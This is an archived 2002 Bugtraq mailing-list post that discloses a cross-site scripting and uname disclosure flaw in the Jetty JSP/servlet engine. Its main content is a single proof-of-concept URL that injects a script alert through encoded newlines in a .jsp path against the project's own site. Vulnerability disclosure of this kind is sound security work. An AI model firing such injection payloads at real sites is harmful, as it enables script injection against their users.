[27215] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Jetty jsp/servlet engine xss / uname disclosure vuln

daemon@ATHENA.MIT.EDU (skinnay@skinnux.com)
Sat Sep 28 15:36:02 2002

Message-ID: <2564.10.0.0.4.1033235597.squirrel@skinnux.com>
Date: Sat, 28 Sep 2002 13:53:17 -0400 (EDT)
From: <skinnay@skinnux.com>
To: <bugtraq@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Jetty is an open source jsp/servlet engine thingamabob
http://jetty.mortbay.org

observe
http://jetty.mortbay.org/%0a%0a<script>alert("jax%20is%20ereet%20:P")</script>.jsp

found by skinnay@skinnux.com
www.skinnux.com
( site and email down alot, not that anyone emails me anyway :)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[27215] in bugtraq

Jetty jsp/servlet engine xss / uname disclosure vuln

daemon@ATHENA.MIT.EDU (skinnay@skinnux.com)Sat Sep 28 15:36:02 2002

daemon@ATHENA.MIT.EDU (skinnay@skinnux.com)
Sat Sep 28 15:36:02 2002